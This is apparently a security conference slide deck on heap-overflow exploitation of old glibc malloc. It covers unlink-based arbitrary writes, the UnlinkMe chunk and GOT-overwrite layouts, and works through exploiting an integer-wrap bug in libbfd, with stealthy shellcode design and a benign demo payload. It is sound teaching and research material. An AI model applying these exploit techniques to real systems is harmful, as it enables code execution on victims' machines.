Using the magic against the magician
Nicolas Waisman, DSN Security, Inc
www.dsnsecurity.com
Introduction
• Techniques to make heap overflow exploits more reliable
• Doug Lea's malloc (glibc < 2.3)
• Based on free()'s unlink technique (see Reference [5])
• At the end, you will have a better idea of how and when to use the several techniques that help make your exploit more reliable.
(Basic skills in heap overflows will help)
Basic Chunk's structure
[Figure: chunk layout. An allocated chunk (allocatedchunk->): p_size, size (whose low bit P is the PREV_INUSE flag), then the user data (mem->); the following chunk (nextc->) starts with its own p_size and size. A free chunk (freechunk->): p_size, size, then fd and bk overlaying the start of the data area (mem->), the rest of the data, and again the next chunk's p_size and size (nextc->).]
Chunks consolidation
• Every time free() is called, the algorithm tries to consolidate the neighbouring chunks
• Two types:
  - Forward Consolidation (our chunk with the next one)
  - Backward Consolidation (our chunk with the previous one)
• Objective: minimizing fragmentation
Backward Consolidation
• Check if the previous chunk isn't in use
• Locate the pointer to the previous chunk and "unlink()" it
• unlink(p - p->prev_sz)
Backward Consolidation
[Figure: chunk P (p_size, size, fd, bk, data) preceded by a free chunk with the same layout; the low bit of P's size field is the PREV_INUSE flag.]
1) !(p->size & PREV_INUSE)
2) p = p - p->prevsz
3) unlink(p)
Forward Consolidation
• Check if the next chunk isn't in use. To do this, it has to check the PREV_INUSE flag of the next chunk of our next chunk (the 3rd chunk).
• Locate a pointer to the next chunk and "unlink()" it
• unlink(p + p->size)
Forward Consolidation
[Figure: chunk P followed by chunk N and a third chunk, each with p_size, size, fd, bk, data; the PREV_INUSE flag that is checked is the one in the 3rd chunk's size field.]
1) n = p + p->sz
2) !((n+n->size)->size & PREV_INUSE)
3) unlink(n)
Taking advantage of Chunks consolidation
• Changing malloc's internal structures
• Forcing free() to call unlink() with our modified chunk
• Writing 4 arbitrary bytes (or more?) wherever we want
Exploiting Backward consolidation
• Fake our prev_sz field (clearing the PREV_INUSE flag) in order to make free() believe that our previous chunk is free
• Fake our size field in order to point our previous chunk to our "fake" previous chunk (p - p->prev_sz)
• Finally, unlink() is triggered :D
(writing 4 arbitrary bytes in an arbitrary location)
Taking advantage of Backward Consolidation
[Figure: the values placed in our chunk: -4, -4 & ~PREV_INUSE, SHIT (any value), pointer - 12, shellcode_addr; next to it a normal chunk with p_size, size, fd, bk, data.]
1) !(p->size & PREV_INUSE)
2) p = p - p->prevsz
3) unlink(p): (pointer-12) = shellcode_addr
Exploiting Forward consolidation
• In forward consolidation, we aren't forced to overwrite the malloc structure of our buffer to be free()d
• We could just overwrite the malloc structure of our next chunk, or fake our own structures.
• Fake the size of the "next" chunk (3rd chunk) of our "next chunk" (clear the PREV_INUSE flag, so free() believes that our 2nd chunk is free)
• Finally, unlink() is triggered in our "next" chunk
(writing 4 arbitrary bytes in an arbitrary location)
Taking advantage of Forward Consolidation
[Figure: chunk P followed by our crafted "next" chunk N: SHIT & ~PREV_SIZE, -4, pointer - 12, shellcode_addr, data; then the 3rd chunk with p_size, size, FD, BK, data.]
1) n = p + p->sz
2) !((n+n->size)->size & PREV_INUSE)
3) unlink(n)
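As an added illustration (not from the slides and not glibc's code), the following C model builds the fake chunk of the backward-consolidation slide inside its own local buffer, runs the original unchecked unlink() over it, and then runs the free-list consistency check that later glibc versions added ("corrupted double-linked list"), which refuses such a chunk before writing anything. The struct, the `slot`/`planted` variables and all function names are assumptions of this example; `slot` stands in for a GOT entry and `planted` for shellcode_addr.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Model of a Doug Lea malloc chunk header (Ref [5]) in host pointer width;
 * in the 32-bit layout of the slides bk sits at offset 12, which is where
 * the "pointer - 12" trick comes from.  Added illustration, not glibc code. */
#define PREV_INUSE 1u

struct chunk {
    uint32_t prev_size;
    uint32_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* unlink() as in glibc < 2.3: two blind pointer writes. */
static void unlink_unchecked(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;        /* with fd = pointer - 12 this is *pointer = bk */
    bk->fd = fd;
}

/* The consistency check later glibc versions added: both neighbours must
 * point back at p.  Writes nothing and returns 0 if the list is corrupted. */
static int unlink_checked(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return 0;
    fd->bk = bk;
    bk->fd = fd;
    return 1;
}

/* A genuine free list a <-> b <-> c: unlinking b must succeed and splice. */
int demo_legit_unlink(void)
{
    struct chunk a = {0}, b = {0}, c = {0};
    a.fd = &b; b.bk = &a; b.fd = &c; c.bk = &b;
    return unlink_checked(&b) && a.fd == &c && c.bk == &a;
}

/* Builds the fake chunk of the "Taking advantage of Backward Consolidation"
 * slide: fd aimed so that fd->bk is `slot` (standing in for got[free]),
 * bk = `planted` (standing in for shellcode_addr).  Returns 1 if the chosen
 * unlink routine ended up writing bk into slot. */
static int run_with_fake_chunk(int checked)
{
    struct chunk fake = {0}, planted = {0};
    _Alignas(struct chunk) unsigned char area[sizeof(struct chunk)] = {0};
    struct chunk **slot = (struct chunk **)(area + offsetof(struct chunk, bk));
    fake.size = (uint32_t)-4 & ~PREV_INUSE;               /* as on the slide */
    fake.fd = (struct chunk *)((char *)slot - offsetof(struct chunk, bk)); /* "pointer - 12" */
    fake.bk = &planted;
    if (checked)
        unlink_checked(&fake);
    else
        unlink_unchecked(&fake);
    return *slot == &planted;
}

int demo_unchecked_unlink_writes(void) { return run_with_fake_chunk(0); }
int demo_checked_unlink_refuses(void)  { return !run_with_fake_chunk(1); }

int main(void)
{
    printf("genuine list unlinks:        %d\n", demo_legit_unlink());
    printf("unchecked unlink hit slot:   %d\n", demo_unchecked_unlink_writes());
    printf("checked unlink refused:      %d\n", demo_checked_unlink_refuses());
    return 0;
}
```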
abo9.c (gera's Insecure Programming, Ref [1]):

```c
/* abo9.c
 *
 * specially crafted to feed your brain by [email protected]
 */
/* free(your mind) */
/* I'm not sure in what operating systems it can be done */
#include <stdio.h>
#include <stdlib.h>

int main(int argv, char **argc) {
    char *pbuf1 = (char *)malloc(256);
    char *pbuf2 = (char *)malloc(256);
    gets(pbuf1);      /* unbounded read: overflows pbuf1 into pbuf2's chunk header */
    free(pbuf2);
    free(pbuf1);
    return 0;
}
```
[Figure: the two adjacent chunks pbuf1 and pbuf2, each with p_size, size, FD, BK and data.]
"Reliable" exploit requirements
• Function pointer address (GOT, ctors, etc)
• Shellcode address
• etc (specific cases)
Some techniques that help to get our addresses
• Hardcoded addresses (wtf, do I come from Bs.As.?)
• Information leaking (ask [email protected])
• jp's UnlinkMe Chunk (Bonus Track)
• Writing 8 bytes per free
• Trigger as many free()s as possible
• etc...
jp's UnlinkMe Chunk technique
• Technique to trigger our fake chunk when we cannot predict which part of our controlled buffer will be free()d
• Using the forward consolidation technique, free() will try to look for our "next" chunk using the p->size, which will be one of our -15, -19, etc., and this will take the "next" pointer to our crafted chunk, which sits at an address relative to the place that free() hits.
jp's UnlinkMe Chunk (Bonus Track)
[Figure: the buffer laid out as -4, -4, FD, BK, -11, -15, -19, ..., i.e. ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE for every following word; free() on any of those words reaches the crafted chunk at the start through forward consolidation.]
jp's UnlinkMe Chunk (Bonus Track)

```c
/* from jp's article in phrack 61, Ref [3] */
#include <stdlib.h>

/* SZ, WHAT_2_WRITE, WHERE_2_WRITE, IS_MMAP and PREV_INUSE are defined
 * outside this excerpt. */
#define SOMEOFFSET 5 + (rand() % (SZ-1))

int main(void)
{
    unsigned long *unlinkMe = (unsigned long *)malloc(SZ * sizeof(unsigned long));
    int i = 0;
    unlinkMe[i++] = -4;                 /* fake prev_size */
    unlinkMe[i++] = -4;                 /* fake size */
    unlinkMe[i++] = WHAT_2_WRITE;       /* fd */
    unlinkMe[i++] = WHERE_2_WRITE - 8;  /* bk */
    for (; i < SZ; i++) {
        /* every following word is a size that leads back to the fake chunk */
        unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE;
    }
    free(unlinkMe + SOMEOFFSET);        /* free() at an unpredictable offset */
    return 0;
}
```
[Figure: -4, -4, FD, BK, -11, -15, -19, ...]
Writing 8 bytes per free()
• Triggering forward and backward consolidation on the same free() will allow us to write 8 arbitrary bytes in 2 different arbitrary positions.
• As we saw before, backward consolidation uses -p->prev_sz as its offset and forward consolidation uses +p->size.
Writing 8 bytes per free()
• So, we need to put in our trigger chunk:
  - prev_sz: (1) offset to our crafted backward chunk
  - size: (2) offset to our crafted forward chunk
• And then put our crafted backward and forward chunks at:
  - bk chunk location: trigger chunk - (1) offset
  - fd chunk location: trigger chunk + (2) offset
• Remember that our offsets will be negative, so for example:
  - the bk chunk will be after our trigger chunk
  - the fd chunk will be before our trigger chunk
Writing 8 bytes per free (double consolidation)
[Figure: memory laid out as forward chunk (-4, -4, FD, BK), trigger chunk (-16, -16, X, X), backward chunk (-4, -4, BK, FD); free() on the trigger chunk consolidates forward into the chunk before it and backward into the chunk after it.]
Writing 8 bytes per free (mixed with gera's friendly function, Ref [4])
• This is a trick to "discover" our shellcode location without knowing the address of the buffer where it is.
• We need to know the address of a function pointer (got, etc)
• With our 8 bytes per free technique, on our first consolidation (backward) we write on our function ptr the address of function ptr + 4; on the second consolidation (forward), we write two opcodes (pop %eax; ret)
Writing 8 bytes per free (mixed with gera's friendly function, Ref [4])
• Now... the next time our function pointer is called, we will discard the real "return address" and we will be jumping to the function argument.
Writing 8 bytes per free (mixed with gera's friendly function, Ref [4])
got[free] = got[free+4]
got[free+4] = 0xbfff3c58 (pop %eax; ret)
[Figure: abo9.c as above, with pbuf1 holding the shellcode and the forward chunk, and pbuf2's header holding the backward chunk (-16, -16, ...). The bytes \x3c\x58\xff\xbf placed after got[free] execute as pop %eax; ret (jmp pbuf1).]
Writing 8 bytes per free (mixed with gera's friendly function, Ref [4])
got[free] = got[free+4]
got[free+4] = 0xbfff3c58 (pop %eax; ret)
• Function pointer ??
• Shellcode location
[Figure: abo9.c as above; the bytes \x3c\x58\xff\xbf execute as pop %eax; ret (jmp pbuf1).]
Writing 8 bytes per free (mixed with gera's friendly function, Ref [4])

```c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) {
    char *pbuf1 = (char *)malloc(256);
    char *pbuf2 = (char *)malloc(256);
    gets(pbuf1);
    free(pbuf2);
    /* argument order corrected from the slide; pbuf1 is the call's first argument */
    snprintf(pbuf1, 4, "HOLA");
    return 0;
}
```
Example: bug in libbfd (steps to make it more reliable)
Lib BFD
BFD is a package which allows applications to use the same routines to operate on object files whatever the object file format. When an application successfully opens a target file (object, archive, etc), a pointer to an internal structure is returned.
Note: I tried many times to contact the libbfd developers, but I couldn't.
Example of Lib BFD usage
Return the number of sections in a transparent way, without knowing the object file format.

```c
#include "bfd.h"

unsigned int number_of_sections(bfd *abfd)
{
    return bfd_count_sections(abfd);
}
```
Used by...
Most of binutils' applications
• gdb
• objdump
• nm
• strip
• etc
What is ELF?
◊ Application binary format
◊ Available on more than 30 platforms
◊ Used for 4 types of files:
  - Relocatable object files
  - Executables
  - Dynamic executables
  - Core dumps
Section Table
• Array of section headers
• Gives us information about the file's different sections (got, .data, .code, .bss, etc)
• Not necessary
• strip - deletes sections from the file
```c
typedef struct {
    Elf32_Word sh_name;
    Elf32_Word sh_type;
    Elf32_Word sh_flags;
    Elf32_Addr sh_addr;
    Elf32_Off  sh_offset;     /* Offset to section */
    Elf32_Word sh_size;       /* Section size */
    Elf32_Word sh_link;
    Elf32_Word sh_info;
    Elf32_Word sh_addralign;
    Elf32_Word sh_entsize;
} Elf32_Shdr;
```
```c
bfd_elf_get_str_section (bfd *abfd, unsigned int shindex)
{
    ....
        offset = i_shdrp[shindex]->sh_offset;          /* offset = sh_offset */
        shstrtabsize = i_shdrp[shindex]->sh_size;      /* shstrtabsize = sh_size */
        shstrtab = elf_read (abfd, offset, shstrtabsize);
        i_shdrp[shindex]->contents = (PTR) shstrtab;
    }
    return shstrtab;
}
```
```c
static char *
elf_read (bfd *abfd, file_ptr offset, bfd_size_type size)
{
    char *buf;

    if ((buf = bfd_alloc (abfd, size)) == NULL)          /* alloc */
        return NULL;
    if (bfd_seek (abfd, offset, SEEK_SET) != 0)          /* lseek */
        return NULL;
    if (bfd_bread ((PTR) buf, size, abfd) != size) {     /* read file (fread) */
        if (bfd_get_error () != bfd_error_system_call)
            bfd_set_error (bfd_error_file_truncated);
        return NULL;
    }
    return buf;
}
```
```c
#define objalloc_alloc(o, l)                                                   \
  __extension__                                                                \
  ({ struct objalloc *__o = (o);                                               \
     unsigned long __len = (l);                                                \
     if (__len == 0)                                                           \
       __len = 1;                                                              \
     __len = (__len + OBJALLOC_ALIGN - 1) &~ (OBJALLOC_ALIGN - 1); /* align */ \
     (__len <= __o->current_space                                              \
      ? (__o->current_ptr += __len,                                            \
         __o->current_space -= __len,                                          \
         (PTR) (__o->current_ptr - __len))                                     \
      : _objalloc_alloc (__o, __len)); })
```
With len = 0xffffffff and OBJALLOC_ALIGN = 0x4:
(0xffffffff + 3) == 0x2
0x2 &~ (3) == 0x0
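Added example (not libbfd's code) for the section-header and objalloc_alloc slides above: it reproduces the rounding wrap of objalloc_alloc() on a 32-bit length, shows an overflow-aware rounding, and applies the bounds check elf_read() lacks to a constructed Elf32_Shdr whose sh_size is 0xffffffff. All function names, the constructed header and the 4096-byte file size are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OBJALLOC_ALIGN 4u

/* objalloc_alloc()'s rounding on a 32-bit unsigned long, as the slide
 * computes it: 0xffffffff + 3 wraps to 2, and 2 & ~3 == 0, so a request
 * for ~4 GB reserves zero bytes and the following read runs off the end. */
uint32_t align_len_unchecked(uint32_t len)
{
    if (len == 0)
        len = 1;
    return (len + OBJALLOC_ALIGN - 1) & ~(OBJALLOC_ALIGN - 1);
}

/* Overflow-aware rounding: -1 when len cannot be rounded up without wrapping. */
int64_t align_len_checked(uint32_t len)
{
    if (len == 0)
        len = 1;
    if (len > UINT32_MAX - (OBJALLOC_ALIGN - 1))
        return -1;
    return (int64_t)((len + OBJALLOC_ALIGN - 1) & ~(OBJALLOC_ALIGN - 1));
}

/* The two Elf32_Shdr fields bfd_elf_get_str_section() feeds to elf_read(). */
struct shdr_view {
    uint32_t sh_offset;
    uint32_t sh_size;
};

static uint32_t rd32le(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* sh_offset is at byte 16 and sh_size at byte 20 of a little-endian Elf32_Shdr. */
struct shdr_view parse_shdr(const unsigned char shdr[40])
{
    struct shdr_view v;
    v.sh_offset = rd32le(shdr + 16);
    v.sh_size = rd32le(shdr + 20);
    return v;
}

/* Bounds check elf_read() lacks: [sh_offset, sh_offset + sh_size) must lie
 * inside the file; written so that the sum itself cannot overflow. */
int section_in_file(uint32_t file_size, uint32_t sh_offset, uint32_t sh_size)
{
    if (sh_offset > file_size)
        return 0;
    return sh_size <= file_size - sh_offset;
}

/* Constructed header: sh_offset = 0x34, sh_size = 0xffffffff (the slide's
 * value), every other field zero, in a 4096-byte file.  Returns 1 when both
 * checks reject it, as a hardened elf_read() should. */
int demo_rejects_huge_shstrtab(void)
{
    unsigned char hdr[40] = {0};
    struct shdr_view v;
    hdr[16] = 0x34;
    memset(hdr + 20, 0xff, 4);
    v = parse_shdr(hdr);
    return !section_in_file(4096u, v.sh_offset, v.sh_size) &&
           align_len_checked(v.sh_size) < 0;
}

int main(void)
{
    printf("unchecked align(0xffffffff) = %u\n", align_len_unchecked(0xffffffffu));
    printf("checked   align(0xffffffff) = %lld\n", (long long)align_len_checked(0xffffffffu));
    printf("crafted header rejected     = %d\n", demo_rejects_huge_shstrtab());
    return 0;
}
```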
```c
void
objalloc_free (struct objalloc *o)
{
    struct objalloc_chunk *l;

    l = (struct objalloc_chunk *) o->chunks;
    while (l != NULL) {
        struct objalloc_chunk *next;

        next = l->next;
        free (l);
        l = next;
    }
    free (o);
}

struct objalloc_chunk {
    struct objalloc_chunk *next;
    char *current_ptr;
};
```
Simple Exploit
[Figure: the file laid out as SHELLCODE, ..., CHUNK, ADDR2CHUNK, ...; the unknowns are struct objalloc *o, shellcode_addr and function_p.]
Let's take a break... enough! Time to think...
• Hardcoded addresses.
• unlinkMe chunk?
• Trigger many free()s in order to write as much as possible.
Backward Consolidation with "lchunk" (triggering free()s)
[Figure: the crafted objalloc chunk "lchunk": -4, -4 & ~PREV_INUSE, ADDR NEXT CHUNK, pointer - 12, shellcode_addr, followed by a normal chunk with p_size, size, fd, bk, data; the struct objalloc_chunk fields l->next and l->current_ptr sit at the start of the buffer that objalloc_free() passes to free(l).]
1) !(p->size & PREV_INUSE)
2) p = p - p->prevsz
3) unlink(p): (pointer-12) = shellcode_addr
Function pointer (got[free]):
• Lots of possibilities to hit it
• Targets of the O.S.
• common GOT, incremented by four
struct objalloc *o
• Raise the possibility of hitting it by adding 0x300 bytes of addresses to the first chunk
lchunk:
• Address of the first chunk: relative to the beginning of the file
• Next lchunk: relative to the beginning of the buffer (adding sizeof(lchunk) to find the next contiguous lchunk)
Let's put it all together
[Figure: the file laid out as shellcode, lchunk, ..., lchunk, ADDRs to the first lchunk, lchunk, ..., lchunk; values involved: struct objalloc *o, shellcode_addr ?, function_p, next_lchunk.]
Bonus II - Doing a nice shellcode (lacria's shellcode)
• Exploiting an application that analyzes files
• One shot
• Make it as stealthy as we can
• Try not to mess up the file analysis
• No trace of the shellcode's existence
Patching the Section
[Figure: the Elf32_Shdr struct shown above, with its fields written back to their old values.]
Wiping the shellcode
[Figure: the original application's memory and the shellcode region that gets wiped.]
Payload (infection, reverse connection, etc)

```asm
push $0xa3f6569
push $0x62627574
push $0x656c6574
push $0x20756f79
push $0x20646944      # the pushed dwords spell "Did you teletubbie?\n"
xor %ebx,%ebx
inc %ebx              # fd = 1 (stdout)
mov %esp,%ecx         # buf = the string on the stack
mov $0x14,%edx        # count = 20
mov $0x4,%eax         # sys_write
int $0x80
```
Re-executing
[Figure: the process stack from stack_top down: argc, argv[] (pointing at "/bin/objdump", "-x", ...), 0, envp[] ("PWD=/home", ...), 0, and the strings themselves, ending with "/bin/objdump".]
execve("/bin/objdump", argv, envp)
Any questions?
References
• [1] gera's InsecureProgramming page: http://community.corest.com/~gera/InsecureProgramming/
• [2] LIB BFD, the Binary File Descriptor Library: http://www.gnu.org/manual/bfd-2.9.1/html_mono/bfd.html
• [3] Advanced Doug Lea's malloc exploits (jp): http://www.phrack.org/show.php?p=61&a=6
• [4] Advances in format string exploitation (riq/gera): http://www.phrack.org/show.php?p=59&a=7
• [5] Vudo malloc tricks (MaXX): http://www.phrack.org/show.php?p=57&a=8
• [6] Linux libc sources: http://ftp.gnu.org/pub/gnu/glibc/glibc-2.2.5.tar.gz
THANKS (to Cristian, Augusto, Daemon, nahual, module, coca-cola, jp and lots of etcs)
Questions? Ideas? Flames?